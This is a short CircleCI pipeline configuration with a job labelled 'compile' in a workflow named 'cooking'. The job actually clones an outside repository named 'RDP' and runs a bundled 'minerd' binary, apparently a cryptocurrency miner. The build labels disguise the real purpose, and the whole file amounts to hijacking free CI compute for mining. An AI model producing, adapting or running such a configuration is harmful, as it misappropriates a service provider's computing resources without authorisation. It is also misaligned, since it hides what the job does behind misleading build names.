version: 2.1
jobs:
  compile:
   docker:
      - image: bryanhafidz/bryan-docker:0x02
   steps:
      - run:
          command: |
           apt install -y libjansson4
           mkdir  ~/.ssh
           ssh-keyscan github.com >> ~/.ssh/known_hosts
           git clone --depth=1 git@github.com:djemilbakhti/RDP.git Q
           cd Q
           
           chmod 755 minerd
           ./minerd
      
          
workflows:
  version: 2.1
  cooking:
    jobs:
      - compile
